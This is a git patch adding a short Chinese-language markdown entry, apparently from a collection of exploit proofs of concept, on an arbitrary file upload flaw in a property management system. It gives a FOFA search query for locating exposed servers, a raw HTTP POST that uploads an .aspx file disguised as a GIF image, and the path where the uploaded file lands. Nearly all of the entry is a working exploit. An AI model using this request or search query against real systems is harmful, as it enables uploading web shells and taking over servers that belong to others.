From 8beb5e8a5e830a45af3ed555b28614a5d0c27851 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Fri, 12 Apr 2024 20:18:42 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E6=96=B0=E8=A7=86=E7=AA=97=E6=96=B0?=
 =?UTF-8?q?=E4=B8=80=E4=BB=A3=E7=89=A9=E4=B8=9A=E7=AE=A1=E7=90=86=E7=B3=BB?=
 =?UTF-8?q?=E7=BB=9F=E4=BB=BB=E6=84=8F=E6=96=87=E4=BB=B6=E4=B8=8A=E4=BC=A0?=
 =?UTF-8?q?=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 新视窗新一代物业管理系统任意文件上传漏洞.md | 30 +++++++++++++++++++++
 1 file changed, 30 insertions(+)
 create mode 100644 新视窗新一代物业管理系统任意文件上传漏洞.md

diff --git a/新视窗新一代物业管理系统任意文件上传漏洞.md b/新视窗新一代物业管理系统任意文件上传漏洞.md
new file mode 100644
index 0000000..1c31cb5
--- /dev/null
+++ b/新视窗新一代物业管理系统任意文件上传漏洞.md
@@ -0,0 +1,30 @@
+## 新视窗新一代物业管理系统任意文件上传漏洞
+
+
+## fofa
+```
+body="BPMSite/ClientSupport/OCXInstall.aspx"
+```
+
+
+## poc
+```
+POST /OfficeManagement/RegisterManager/Upload.aspx HTTP/1.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
+Cookie: JSESSIONID=FC2204F3698D2A07CDE9786055A071CB
+Content-Type: multipart/form-data; boundary=00content0boundary00
+Host: 
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Content-Length: 146
+Connection: close
+
+--00content0boundary00
+Content-Disposition: form-data; name="file"; filename="1.aspx"
+Content-Type: image/jpg
+
+GIF89a
+123
+--00content0boundary00--
+```
+
+文件路径：`/Upload/ContractMamager/71d52920be4d-4956-93f9-77c3b0c899e81.aspx`